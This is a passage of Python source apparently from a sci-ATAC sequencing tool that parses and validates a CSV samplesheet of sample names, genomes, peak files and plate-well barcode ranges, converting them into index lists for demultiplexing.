None, None ] ):\n \"\"\"\n Convert an index specification to an index string.\n Acceptable index specifications include\n o single integer index\n o 76\n o range of integer indexes, example\n o 5-9\n o single and/or ranges of indexes separated by commas, examples\n o 3,6\n o 3,5-9\n o 2-4,9-18\n o 2:4,9:18\n \"\"\"\n index_list = []\n string_in = re.sub( r'\s', '', string_in )\n for index_range in string_in.split( ',' ):\n mobj = re.match( r'([0-9]+)([-:]([0-9]+))?$', index_range )\n if( not mobj ):\n print( 'Error: spreadsheet cell: %s%s: bad index range \'%s\'' % ( element_coordinates[0], element_coordinates[1], index_range ), file=sys.stderr )\n sys.exit( -1 )\n index1 = int( mobj.group( 1 ) )\n if( index1 < 1 or index1 > max_index ):\n print( 'Error: spreadsheet cell: %s%s: bad index range \'%s\'' % ( element_coordinates[0], element_coordinates[1], index_range ), file=sys.stderr )\n sys.exit( -1 )\n index2 = int( mobj.group( 3 ) ) if mobj.group( 2 ) else index1\n if( index2 < 1 or index2 > max_index ):\n print( 'Error: spreadsheet cell: %s%s: bad index range \'%s\'' % ( element_coordinates[0], element_coordinates[1], index_range ), file=sys.stderr )\n sys.exit( -1 )\n if( index2 < index1 ):\n print( 'Error: spreadsheet cell: %s%s: bad index range \'%s\'' % ( element_coordinates[0], element_coordinates[1], index_range ), file=sys.stderr )\n sys.exit( -1 )\n for i in range( index1, index2 + 1 ):\n index_list.append( i )\n return( check_index_list( index_list, element_coordinates ) )\n\n\ndef parse_wells( string_in, across_row_first=True, max_index = 96, element_coordinates = [ None, None ] ):\n \"\"\"\n Convert a well specification to an index string.\n Acceptable well specifications include\n o a single well without a plate specified (implicit plate=1), examples\n o A5\n o A05\n o a single well with a plate specified\n o P1-A5\n o P1:A5\n o the same well from all four plates\n o P*-A5\n o P*:A5\n o range of wells without plates specified,\n Note: the range of indices depends on whether the reaction type is n5/p5 or n7/p7.\n o A9-B9\n o A9:B9\n o range of wells with plates specified,\n o P1-A5:P1-A12\n o P1:A5-P1:A12\n o P1:A5:P1:A12\n o 
P1-A5-P1-A12\n o the same range of wells from all four plates\n o P*-A5:P*-A10\n o single and/or ranges of wells separated by commas\n o A10,P1-B5:P1-B10,C7\n \"\"\"\n index_list = []\n string_in = re.sub( r'\\s', '', string_in )\n for well_range in string_in.split( ',' ):\n expand_plate_flag = False\n# mobj = re.match( r'(P([1-4])-)?([A-H])([01]?[0-9])([-:](P([1-4])-)?([A-H])([01]?[0-9]))?$', well_range )\n mobj = re.match( r'([pP][0]?([1-4*])[-:])?([a-hA-H])([0]?[1-9][0-2]?)([-:]([pP][0]?([1-4*])[-:])?([a-hA-H])([0]?[1-9][0-2]?))?$', well_range )\n if( not mobj ):\n print( 'Error: spreadsheet cell: %s%s: bad well or well range \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], well_range ), file=sys.stderr )\n sys.exit( -1 )\n #\n # first well\n row1 = mobj.group( 3 )\n col1 = int( mobj.group( 4 ) )\n if( col1 < 1 or col1 > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad well: \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n # is plate specified?\n if( mobj.group( 1 ) ):\n if( mobj.group( 2 ) == '*' ):\n plate1_list = [ 1, 2, 3, 4 ]\n else:\n plate1_list = [ int( mobj.group( 2 ) ) ]\n else:\n plate1_list = [ 1 ]\n #\n if( mobj.group( 5 ) ):\n if( ( mobj.group( 2 ) == None ) != ( mobj.group( 7 ) == None ) ):\n print( 'Error: spreadsheet cell: %s%s: either both or neither well in a range must have plates specified: \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n if( ( mobj.group( 2 ) == '*' ) != ( mobj.group( 7 ) == '*' ) ):\n print( 'Error: spreadsheet cell: %s%s: either both or neither well in a range must have plates specified as \\'*\\': \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n\n # second well, if this is a range\n row2 = mobj.group( 8 )\n col2 = int( mobj.group( 9 ) )\n if( col2 < 1 or col2 > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad well: \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n # is plate specified?\n if( mobj.group( 6 ) ):\n if( mobj.group( 7 ) == '*' ):\n plate2_list = [ 1, 2, 3, 4 ]\n else:\n plate2_list = [ int( mobj.group( 7 ) ) ]\n else:\n plate2_list = [ 1 ]\n #\n else:\n plate2_list = plate1_list\n row2 = row1\n col2 = col1\n #\n for plate1, plate2 in zip( plate1_list, plate2_list ):\n index1 = well_to_index( plate1, row1, col1, across_row_first, element_coordinates )\n index2 = well_to_index( plate2, row2, col2, across_row_first, element_coordinates )\n if( index2 < index1 ):\n print( 'Error: spreadsheet cell: %s%s: bad well range: \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n for i in range( index1, index2 + 1 ):\n index_list.append( i )\n return( check_index_list( index_list, element_coordinates ) )\n\n\ndef parse_rows( string_in, element_coordinates = [ None, None ] ):\n \"\"\"\n Convert a row specification to an index string.\n Acceptable row specifications include\n o single row\n o B\n o row range\n o E-G\n o single and/or ranges of rows separated by commas\n o E-F,H\n \"\"\"\n index_list = []\n string_in = re.sub( r'\\s', '', string_in )\n for row_range in string_in.split( ',' ):\n mobj = re.match( r'([a-hA-H])([-:]([a-hA-H]))?$', row_range )\n if( not mobj ):\n print( 'Error: spreadsheet cell: %s%s: bad row or row range \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], row_range ), file=sys.stderr )\n 
sys.exit( -1 )\n row1 = mobj.group( 1 )\n row1_index = well_to_index( 1, row1, 1, True, element_coordinates )\n row2_index = row1_index\n if( mobj.group( 2 ) ):\n row2 = mobj.group( 3 )\n row2_index = well_to_index( 1, row2, 1, True, element_coordinates )\n if( row2_index < row1_index ):\n print( 'Error: spreadsheet cell: %s%s: bad row range: \'%s\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n index1 = row1_index\n index2 = row2_index + 11\n for i in range( index1, index2 + 1 ):\n index_list.append( i )\n return( check_index_list( index_list, element_coordinates ) )\n\n\ndef parse_columns( string_in, element_coordinates = [ None, None ] ):\n \"\"\"\n Convert a column specification to an index string.\n Acceptable column specifications include\n o single column\n o 5\n o column range\n o 6-8\n o single and/or ranges of columns separated by commas\n o 9-11,3\n \"\"\"\n index_list = []\n string_in = re.sub( r'\s', '', string_in )\n for col_range in string_in.split( ',' ):\n mobj = re.match( r'([1-9][0-2]?)([-:]([1-9][0-2]?))?$', col_range )\n if( not mobj ):\n print( 'Error: spreadsheet cell: %s%s: bad column or column range \'%s\'' % ( element_coordinates[0], element_coordinates[1], col_range ), file=sys.stderr )\n sys.exit( -1 )\n\n col1 = int( mobj.group( 1 ) )\n col1_index = well_to_index( 1, 'A', col1, False, element_coordinates )\n col2_index = col1_index\n if( col1 < 1 or col1 > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad column value: \'%d\'' % ( element_coordinates[0], element_coordinates[1], col1 ), file=sys.stderr )\n sys.exit( -1 )\n if( mobj.group( 2 ) ):\n col2 = int( mobj.group( 3 ) )\n if( col2 < 1 or col2 > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad column value: \'%d\'' % ( element_coordinates[0], element_coordinates[1], col2 ), file=sys.stderr )\n sys.exit( -1 )\n if( col2 < col1 ):\n print( 'Error: spreadsheet cell: %s%s: bad column range: \'%s\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n col2_index = well_to_index( 1, 'A', col2, False, element_coordinates )\n index1 = col1_index\n index2 = col2_index + 7\n for i in range( index1, index2 + 1 ):\n index_list.append( i )\n return( check_index_list( index_list, element_coordinates ) )\n\n\ndef check_rows( column_name_list, csv_rows ):\n \"\"\"\n Trim off empty cells at end of rows and columns\n and check for internal empty cells. 
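(Editor's worked example for the two parsers above: parse_rows('E') covers well indexes (5-1)*12+1 = 49 through 49+11 = 60, and parse_columns('3') covers (3-1)*8+1 = 17 through 17+7 = 24.)\n 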
Allow empty\n internal row.\n Notes:\n o we expect\n o nrows \n \"\"\"\n # check for internal empty row\n csv_rows_out = []\n num_col = len( column_name_list )\n for irow, row_elements in enumerate( csv_rows ):\n num_empty = 0\n row_elements_out = []\n for icol, cell in enumerate( row_elements ):\n if( icol == num_col ):\n break\n if( len( cell ) > 0 or ( column_name_list[icol]['type'] in column_allow_empty_cell ) ):\n row_elements_out.append( cell )\n else:\n num_empty += 1\n if( num_empty == 0 ):\n csv_rows_out.append( row_elements_out )\n elif( num_empty > 0 and num_empty < num_col ):\n print( 'Error: row %d has empty cells' % ( irow + 1 ) )\n sys.exit( -1 )\n return( csv_rows_out )\n\n\ndef read_samplesheet( file ):\n \"\"\"\n Read CSV samplesheet input file.\n Notes:\n o the first row in the file must have column header names.\n o the column header names must be in the list 'column_header_name_list'.\n o the column order is arbitrary.\n \"\"\"\n samplesheet_row_list = []\n csv_rows = csv.reader( file, delimiter=',', quotechar='\"')\n csv_rows = list( csv_rows )\n row_header = csv_rows[0]\n column_name_list = parse_header( row_header )\n csv_rows = check_rows( column_name_list, csv_rows )\n for row_elements in csv_rows[1:]:\n samplesheet_row_list.append( row_elements )\n return( column_name_list, samplesheet_row_list )\n\n\ndef check_sample_names( column_name_list, samplesheet_row_list ):\n \"\"\"\n Check for name degeneracy.\n Check sample names for unacceptable characters and, if present, convert them to '.'.\n Sample names must begin with [a-zA-Z].\n Check that peak groups are positive integers.\n Unacceptable characters are characters that are not a-z, A-Z, 0-9, and '.'\n Check for name degeneracy after substitutions.\n Check that the barnyard sample is labeled 'Barnyard'.\n \"\"\"\n sample_name_in_dict = {}\n sample_name_out_dict = {}\n num_sample_name = 0\n for row_elements in samplesheet_row_list:\n for i in range( len( row_elements ) ):\n column_name_dict = column_name_list[i]\n element_string = row_elements[i]\n if( column_name_dict['type'] != 'sample_name' ):\n continue\n sample_name_in_dict.setdefault( element_string, 0 )\n sample_name_in_dict[element_string] += 1\n num_sample_name += 1\n mobj = re.match( r'[a-zA-Z]', element_string )\n if( not mobj ):\n print( 'Error: sample names must begin with an alphabetic character', file=sys.stderr )\n sys.exit( -1 )\n row_elements[i] = re.sub( r'[^a-zA-Z0-9.]', '.', element_string )\n sample_name_out_dict.setdefault( row_elements[i], True )\n errorFlag = False\n for sample_name in sample_name_in_dict.keys():\n if( sample_name_in_dict[sample_name] > 1 ):\n print( 'Warning: sample name \'%s\' not unique. It is used %d times.' % ( sample_name, sample_name_in_dict[sample_name] ), file=sys.stderr )\n if( len( sample_name_out_dict ) != len( sample_name_in_dict ) ):\n print( 'Error: unacceptable names are not distinct after editing', file=sys.stderr )\n errorFlag = True\n if( errorFlag ):\n sys.exit( -1 )\n # Check barnyard sample name. (This is unnecessary, I believe.)\n# for row_elements in samplesheet_row_list:\n# for i in range( len( row_elements ) ):\n# column_name_dict = column_name_list[i]\n# element_string = row_elements[i]\n# if( column_name_dict['type'] != 'sample_name' ):\n# continue\n# mobj = re.search( r'barn', element_string.lower() )\n# if( mobj and element_string != 'Barnyard' ):\n# print( '**' )\n# print( '** Warning: barnyard sample name (%s) not \'Barnyard\'.
% ( element_string ), file=sys.stderr )\n# print( '** Consider re-naming it to \\'Barnyard\\' for compatibility' )\n# print( '** with the experiment dashboard.' )\n# print( '**' )\n# break\n return( samplesheet_row_list )\n\n\ndef check_genome_names( column_name_list, samplesheet_row_list ):\n \"\"\"\n Check genome names and warn if not in our list.\n \"\"\"\n missing_genome_names_dict = {}\n for row_elements in samplesheet_row_list:\n for i in range( len( row_elements ) ):\n column_name_dict = column_name_list[i]\n element_string = row_elements[i]\n if( column_name_dict['type'] != 'genome' ):\n continue\n if( not row_elements[i] in genome_name_list ):\n missing_genome_names_dict.setdefault( row_elements[i], True )\n if( len( missing_genome_names_dict.keys() ) > 0 ):\n print( 'The following genomes are not in my list of known genomes (they may be mis-spelled or not in my list).', file=sys.stderr )\n for missing_genome_name in missing_genome_names_dict.keys():\n print( ' \\'%s\\'' % ( missing_genome_name ), file=sys.stderr )\n return( 0 )\n\n\ndef check_peak_groups( column_name_list, samplesheet_row_list ):\n \"\"\"\n Check peak group names and exit on error.\n \"\"\"\n bad_peak_groups_dict = {}\n for row_elements in samplesheet_row_list:\n for i in range( len( row_elements ) ):\n column_name_dict = column_name_list[i]\n element_string = row_elements[i]\n if( column_name_dict['type'] != 'peak_group' ):\n continue\n if( len( element_string ) > 0 and re.search(r'[^a-zA-Z0-9_]', element_string ) ):\n bad_peak_groups_dict.setdefault( element_string, True )\n if( len( bad_peak_groups_dict.keys() ) > 0 ):\n print('Unacceptable peak group names (must use only alphabetic, positive integer, and underscore characters):')\n for bad_peak_group in bad_peak_groups_dict.keys():\n print( ' \\'%s\\'' % ( bad_peak_group ) )\n sys.exit( -1 )\n return( 0 )\n\n\ndef check_peak_files( column_name_list, samplesheet_row_list ):\n \"\"\"\n Check peak file names and exit on error.\n \"\"\"\n bad_peak_files_dict = {}\n for row_elements in samplesheet_row_list:\n for i in range( len( row_elements ) ):\n column_name_dict = column_name_list[i]\n element_string = row_elements[i]\n if( column_name_dict['type'] != 'peak_file' ):\n continue\n if( ( len( element_string ) > 0 ) and ( re.search(r'[\\0]+', element_string ) or re.match(r'[^/]', element_string ) ) ):\n bad_peak_files_dict.setdefault( element_string, True )\n if( len( bad_peak_files_dict.keys() ) > 0 ):\n print('Unacceptable peak file names (must start with \\'/\\' and must not contain null characters):')\n for bad_peak_file in bad_peak_files_dict.keys():\n print( ' \\'%s\\'' % ( bad_peak_file ) )\n sys.exit( -1 )\n return( 0 )\n\n\ndef check_peak_spec( column_name_list, samplesheet_row_list ):\n \"\"\"\n Check that each sample has a peak_group or a peak_file or both.\n \"\"\"\n bad_peak_dict = {}\n for row_elements in samplesheet_row_list:\n peak_group_flag = False\n peak_file_flag = False\n for i in range( len( row_elements ) ):\n column_name_dict = column_name_list[i]\n element_string = row_elements[i]\n if( column_name_dict['type'] == 'sample_name' ):\n sample_name = element_string\n if( column_name_dict['type'] == 'peak_group' and len( element_string ) > 0 ):\n peak_group_flag = True\n if( column_name_dict['type'] == 'peak_file' and len( element_string ) > 0 ):\n peak_file_flag = True\n if( ( not peak_group_flag ) and ( not peak_file_flag ) ):\n bad_peak_dict.setdefault( sample_name, True )\n if( len( bad_peak_dict.keys() ) > 0 ):\n print('Samples have no 
peak_group and no peak_file values:')\n for bad_peak_spec in bad_peak_dict.keys():\n print( ' \'%s\'' % ( bad_peak_spec ) )\n sys.exit( -1 )\n return( 0 )\n\n\ndef check_wrap_group( column_name_list, samplesheet_row_list ):\n \"\"\"\n Check that any wrap_group values present contain only valid characters.\n \"\"\"\n bad_wrap_group_dict = {}\n for row_elements in samplesheet_row_list:\n wrap_group_flag = False\n for i in range( len( row_elements ) ):\n column_name_dict = column_name_list[i]\n element_string = row_elements[i]\n if( column_name_dict['type'] != 'wrap_group' ):\n continue\n sample_name = element_string\n if( len( element_string ) > 0 and re.search(r'[^-_.a-zA-Z0-9]', element_string ) ):\n bad_wrap_group_dict.setdefault( element_string, True )\n\n if( len( bad_wrap_group_dict.keys() ) > 0 ):\n print('Samples have no wrap_group values or the values' )\n print('have unacceptable characters. Acceptable characters' )\n print('are alphabetic, positive integers, and \".\", \"_\", and \"-\".')\n for bad_wrap_group in bad_wrap_group_dict.keys():\n print( ' \'%s\'' % ( bad_wrap_group ) )\n sys.exit( -1 )\n return( 0 )\n\n\ndef expand_rows( string_in, element_coordinates = [ None, None ] ):\n \"\"\"\n Expand a P7 row specification to a list of rows.\n Acceptable row specifications include\n o single row\n o B\n o row range\n o E-G\n o single and/or ranges of rows separated by commas\n o E-F,H\n \"\"\"\n string_in = re.sub( r'\s', '', string_in )\n row_list = []\n for row_range in string_in.split( ',' ):\n mobj = re.match( r'([a-hA-H])([-:]([a-hA-H]))?$', row_range )\n if( not mobj ):\n print( 'Error: spreadsheet cell: %s%s: bad row or row range \'%s\'' % ( element_coordinates[0], element_coordinates[1], row_range ), file=sys.stderr )\n sys.exit( -1 )\n icode_row1 = ord(mobj.group( 1 ))\n icode_row2 = icode_row1\n if( mobj.group( 2 ) ):\n icode_row2 = ord(mobj.group( 3 ))\n if( icode_row2 < icode_row1 ):\n print( 'Error: spreadsheet cell: %s%s: bad row range: \'%s\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n for icode in range(icode_row1, icode_row2+1):\n row_list.append(chr(icode))\n return(row_list)\n\n\ndef expand_columns( string_in, element_coordinates = [ None, None ] ):\n \"\"\"\n Expand a P5 column specification to a list of columns.\n Acceptable column specifications include\n o single column\n o 5\n o column range\n o 6-8\n o single and/or ranges of columns separated by commas\n o 9-11,3\n \"\"\"\n string_in = re.sub( r'\s', '', string_in )\n column_list = []\n for col_range in string_in.split( ',' ):\n mobj = re.match( r'([1-9][0-2]?)([-:]([1-9][0-2]?))?$', col_range )\n if( not mobj ):\n print( 'Error: spreadsheet cell: %s%s: bad column or column range \'%s\'' % ( element_coordinates[0], element_coordinates[1], col_range ), file=sys.stderr )\n sys.exit( -1 )\n\n icol_col1 = int( mobj.group( 1 ) )\n icol_col2 = icol_col1\n if( icol_col1 < 1 or icol_col1 > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad column value: \'%d\'' % ( element_coordinates[0], element_coordinates[1], icol_col1 ), file=sys.stderr )\n sys.exit( -1 )\n if( mobj.group( 2 ) ):\n icol_col2 = int( mobj.group( 3 ) )\n if( icol_col2 < 1 or icol_col2 > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad column value: \'%d\'' % ( element_coordinates[0], element_coordinates[1], icol_col2 ), file=sys.stderr )\n sys.exit( -1 )\n if( icol_col2 < icol_col1 ):\n print( 'Error: spreadsheet cell: %s%s: bad column range: \'%s\'' % ( element_coordinates[0], 
element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n for i in range( icol_col1, icol_col2 + 1 ):\n column_list.append(str(i))\n return(column_list)\n\n\ndef test_pcr_format(column_name_list):\n \"\"\"\n Find the P7 and P5 columns in the header column_name_list.\n Return the column indices, or None if the P7 and P5 are\n not in the row and column format.\n \"\"\"\n pcr7_column = None\n pcr5_column = None\n for icol in range(len(column_name_list)):\n column_dict = column_name_list[icol]\n if(column_dict['type'] == 'p7' and\n column_dict['format'] == 'rows'):\n pcr7_column = icol\n elif(column_dict['type'] == 'p5' and\n column_dict['format'] == 'columns'):\n pcr5_column = icol\n return(pcr7_column, pcr5_column)\n\n\ndef expand_sample_rows(column_name_list, samplesheet_row_list):\n \"\"\"\n Expand sample rows by each P7 row and P5 column listed for\n each sample. For example, if sample_A has P7 rows 'A,D'\n and P5 columns '5,3', expand_sample_rows returns a list\n that includes two rows for sample_A where the first sample\n row has A for the P7 row and 5 for the P5 column and the\n second row has D and 3 for the P7 row and P5 column,\n respectively.\n \"\"\"\n # If P7 format != p7_rows or P5 format != p5_columns, then\n # return without expanding.\n pcr7_column, pcr5_column = test_pcr_format(column_name_list)\n if(pcr7_column == None or pcr5_column == None):\n return(samplesheet_row_list)\n\n # Expand samples by pairing the i-th P7 row with the i-th P5\n # column for each of the specified rows and columns. Each sample\n # row has one PCR row and one PCR column.\n new_samplesheet_row_list = []\n num_element = len(column_name_list)\n for irow, samplesheet_row in enumerate(samplesheet_row_list):\n element_coordinates = [str( irow + 2 ), chr( pcr7_column + ord( 'A' ))]\n row_list = expand_rows(samplesheet_row[pcr7_column], element_coordinates = element_coordinates)\n element_coordinates = [str( irow + 2 ), chr( pcr5_column + ord( 'A' ))]\n column_list = expand_columns(samplesheet_row[pcr5_column], element_coordinates = element_coordinates)\n if(len(row_list) != len(column_list)):\n print('Error: number of rows is not equal to number of columns in sample sheet row %d' % (irow + 2))\n sys.exit(-1)\n num_expand = len(row_list)\n for iexpand in range(num_expand):\n element_list = []\n for ielem in range(num_element):\n if(ielem == pcr7_column):\n element_list.append(row_list[iexpand])\n elif(ielem == pcr5_column):\n element_list.append(column_list[iexpand])\n else:\n element_list.append(samplesheet_row[ielem])\n new_samplesheet_row_list.append(element_list)\n return(new_samplesheet_row_list)\n\n\ndef make_samplesheet_indexes( column_name_list, samplesheet_row_list ):\n \"\"\"\n Make well index lists for N5, N7, P5, P7 barcode wells from the input samplesheet information.\n \"\"\"\n num_col = len( column_name_list )\n row_out_list = []\n for irow, row_elements in enumerate( samplesheet_row_list ):\n if( len( row_elements ) < num_col ):\n print( 'Error: missing cells in row %d: %s' % ( irow + 1, ', '.join('\"{0}\"'.format(e) for e in row_elements ) ), file=sys.stderr )\n sys.exit( -1 )\n icol = 0\n for element_string, column_name_dict in zip( row_elements, column_name_list ):\n icol += 1\n wrap_group = None\n element_coordinates = [ str( irow + 2 ), chr( icol + ord( 'A' ) - 1 ) ]\n if( column_name_dict['type'] == 'n7' ):\n max_index = 384\n if( column_name_dict['format'] == 'indexes' ):\n n7_index_list = parse_indexes( element_string, max_index, element_coordinates )\n elif( 
column_name_dict['format'] == 'wells' ):\n n7_index_list = parse_wells( element_string, True, max_index, element_coordinates )\n else:\n print( 'Error: unexpected N7 format', file=sys.stderr )\n sys.exit( -1 )\n elif( column_name_dict['type'] == 'n5' ):\n max_index = 384\n if( column_name_dict['format'] == 'indexes' ):\n n5_index_list = parse_indexes( element_string, max_index, element_coordinates )\n elif( column_name_dict['format'] == 'wells' ):\n n5_index_list = parse_wells( element_string, False, max_index, element_coordinates )\n else:\n print( 'Error: unexpected N5 format', file=sys.stderr )\n sys.exit( -1 )\n elif( column_name_dict['type'] == 'p7' ):\n max_index = 96\n if( column_name_dict['format'] == 'indexes' ):\n p7_index_list = parse_indexes( element_string, max_index, element_coordinates )\n elif( column_name_dict['format'] == 'wells' ):\n p7_index_list = parse_wells( element_string, True, max_index, element_coordinates )\n elif( column_name_dict['format'] == 'rows' ):\n p7_index_list = parse_rows( element_string, element_coordinates )\n else:\n print( 'Error: unexpected P7 format', file=sys.stderr )\n sys.exit( -1 )\n elif( column_name_dict['type'] == 'p5' ):\n max_index = 96\n if( column_name_dict['format'] == 'indexes' ):\n p5_index_list = parse_indexes( element_string, max_index, element_coordinates )\n elif( column_name_dict['format'] == 'wells' ):\n p5_index_list = parse_wells( element_string, False, max_index, element_coordinates )\n elif( column_name_dict['format'] == 'columns' ):\n p5_index_list = parse_columns( element_string, element_coordinates )\n else:\n print( 'Error: unexpected P5 format', file=sys.stderr )\n sys.exit( -1 )\n elif( column_name_dict['type'] == 'sample_name' ):\n sample_name = element_string\n elif( column_name_dict['type'] == 'genome' ):\n genome = element_string\n elif( column_name_dict['type'] == 'peak_group' ):\n peak_group = element_string\n elif( column_name_dict['type'] == 'peak_file' ):\n peak_file = element_string\n elif( column_name_dict['type'] == 'wrap_group' ):\n wrap_group = element_string\n #\n row_out_list.append( { 'sample_name': sample_name,\n 'n7_index_list': n7_index_list,\n 'p7_index_list': p7_index_list,\n 'n5_index_list': n5_index_list,\n 'p5_index_list': p5_index_list,\n 'genome': genome,\n 'peak_group': peak_group,\n 'peak_file': peak_file,\n 'wrap_group': wrap_group } )\n return( row_out_list )\n\n\ndef check_sample_identifier( row_out_list, sample_identifier ):\n \"\"\"\n Check for samples that have in common sample identifier well indexes.\n Typically, sci-ATAC experiments use the N5 barcode to identify samples. 
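(Worked example, an editor's addition: if sample A lists N5 indexes 1-8 and sample B lists N5 indexes 5-12, indexes 5-8 are counted more than once, so both samples are named in the warning below.)\n 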
Check whether\n these sample identifier barcodes occur in more than one sample.\n Notes:\n o some experiments use a combination of ligation and PCR barcodes to\n identify samples, and the same ligation barcodes can be assigned\n intentionally to more than one sample \n o issue warning and continue rather than error and exit\n \"\"\"\n key = '%s_index_list' % ( sample_identifier )\n index_dict = {}\n for row_out in row_out_list:\n for i in row_out[key]:\n index_dict.setdefault( i, 0 )\n index_dict[i] += 1\n duplicate_list = []\n for i in index_dict.keys():\n if( index_dict[i] > 1 ):\n duplicate_list.append( i )\n\n if( len( duplicate_list ) > 0 ):\n print( 'Warning: the following samples have %s wells in common' % ( sample_identifier ), file=sys.stderr )\n for row_out in row_out_list:\n if( set( duplicate_list ).intersection( set( row_out[key] ) ) ):\n print( ' %s' % ( row_out['sample_name'] ), file=sys.stderr )\n return( 0 )\n\n\ndef dump_row_out_list( row_out_list ):\n \"\"\"\n Diagnostic function to dump (barcode) well index lists.\n \"\"\"\n for row_out in row_out_list:\n print( 'sample_name: %s' % ( row_out['sample_name'] ) )\n print( ' n7_index_list: %s' % ( make_index_string( row_out['n7_index_list'] ) ) )\n print( ' p7_index_list: %s' % ( make_index_string( row_out['p7_index_list'] ) ) )\n print( ' p5_index_list: %s' % ( make_index_string( row_out['p5_index_list'] ) ) )\n print( ' n5_index_list: %s' % ( make_index_string( row_out['n5_index_list'] ) ) )\n print( ' genome: %s' % ( row_out['genome'] ) )\n return( 0 )\n\n\ndef write_samplesheet_index_format( file, row_out_list ):\n \"\"\"\n Write a well index samplesheet file in Andrew's format.\n \"\"\"\n print( 'sample_id\tranges\tgenome\tpeak_group\tpeak_file', file=file )\n for row_out in row_out_list:\n print( '%s\t%s:%s:%s:%s\t%s\t%s\t%s' % ( row_out['sample_name'],\n make_index_string( row_out['n7_index_list'] ),\n make_index_string( row_out['p7_index_list'] ),\n make_index_string( row_out['p5_index_list'] ),\n make_index_string( row_out['n5_index_list'] ),\n row_out['genome'],\n row_out['peak_group'],\n row_out['peak_file'] ), file=file )\n\n return( 0 )\n\n\ndef get_pcr_row_col( column_name_list, samplesheet_row_list ):\n \"\"\"\n Given lists of PCR rows and columns by sample, return lists of\n distinct PCR rows and columns for the JSON output file. 
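(Worked example, an editor's addition: if every samplesheet row lists P7 rows \"E,F,G\" and P5 columns \"1,2,3\", the identical row/column pattern is kept once, so the returned lists are ['1','2','3'] and ['E','F','G'] rather than one copy per sample.)\n 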
These values\n are used by the demux_dash.\n \"\"\"\n p5_re_pattern = r'([1-9][0-2]?)([-:]([1-9][0-2]?))?$'\n p7_re_pattern = r'([a-hA-H])([-:]([a-hA-H]))?$'\n\n # find required samplesheet column\n p5_samplesheet_col = None\n p7_samplesheet_col = None\n for icol, column_name_dict in enumerate( column_name_list ):\n if( column_name_dict['type'] == 'p5' ):\n p5_samplesheet_col = icol\n if( column_name_dict['type'] == 'p7' ):\n p7_samplesheet_col = icol\n\n # gather plate values\n pair_samplesheet_row_list = []\n for samplesheet_row in samplesheet_row_list:\n p5_samplesheet_row_list = []\n for value_range in samplesheet_row[p5_samplesheet_col].split( ',' ):\n value_range = re.sub( r'\s', '', value_range )\n mobj = re.match( p5_re_pattern, value_range )\n if( not mobj ):\n print( 'Error: bad value or value range \'%s\'' % ( value_range ), file=sys.stderr )\n sys.exit( -1 )\n col1 = int( mobj.group( 1 ) )\n col2 = col1\n if( mobj.group( 2 ) ):\n col2 = int( mobj.group( 3 ) )\n for col in range( col1, col2 + 1 ):\n p5_samplesheet_row_list.append( str( col ) )\n\n p7_samplesheet_row_list = []\n for value_range in samplesheet_row[p7_samplesheet_col].split( ',' ):\n value_range = re.sub( r'\s', '', value_range )\n mobj = re.match( p7_re_pattern, value_range )\n if( not mobj ):\n print( 'Error: bad value or value range \'%s\'' % ( value_range ), file=sys.stderr )\n sys.exit( -1 )\n row1 = mobj.group( 1 )\n row2 = row1\n if( mobj.group( 2 ) ):\n row2 = mobj.group( 3 )\n for orow in range( ord( row1 ), ord( row2 ) + 1 ):\n p7_samplesheet_row_list.append( chr( orow ) )\n\n pair_samplesheet_row_list.append( [ p5_samplesheet_row_list, p7_samplesheet_row_list ] )\n\n pair_list_dict = {}\n for pair_samplesheet_row in pair_samplesheet_row_list:\n key = '_'.join( pair_samplesheet_row[0] ) + '_' + '_'.join( pair_samplesheet_row[1] )\n pair_list_dict.setdefault( key, pair_samplesheet_row )\n\n p5_col_list = []\n p7_row_list = []\n for key in pair_list_dict.keys():\n p5_col_list.extend( pair_list_dict[key][0] )\n p7_row_list.extend( pair_list_dict[key][1] )\n\n return( p5_col_list, p7_row_list )\n\n\ndef get_pcr_wells( column_name_list, samplesheet_row_list ):\n \"\"\"\n Given the samplesheet rows, return lists of specified PCR wells,\n if any.\n \"\"\"\n p5_samplesheet_col = None\n p7_samplesheet_col = None\n for icol, column_name_dict in enumerate( column_name_list ):\n if( column_name_dict['type'] == 'p5' ):\n p5_samplesheet_col = icol\n if( column_name_dict['type'] == 'p7' ):\n p7_samplesheet_col = icol\n\n pair_samplesheet_row_list = []\n for samplesheet_row in samplesheet_row_list:\n p5_samplesheet_row_list = []\n for value_range in samplesheet_row[p5_samplesheet_col].split( ',' ):\n value_range = re.sub( r'\s', '', value_range )\n mobj = re.match( r'([pP][0]?([1-4*])[-:])?([a-hA-H])([0]?[1-9][0-2]?)([-:]([pP][0]?([1-4*])[-:])?([a-hA-H])([0]?[1-9][0-2]?))?$', value_range )\n if( not mobj ):\n print( 'Error: bad well or well range \'%s\'' % ( value_range ), file=sys.stderr )\n sys.exit( -1 )\n\n # Assume that the well-range strings were checked earlier in parse_wells() call so\n # those tests are omitted here. 
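(Editor's note: with the conversions defined earlier, well_to_index( 1, 'A', 5, False ) == 33\n # and index_to_well( 32, False ) == 'A05'; the loops below pass well_index - 1 because\n # index_to_well() is zero-based.)\n # 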
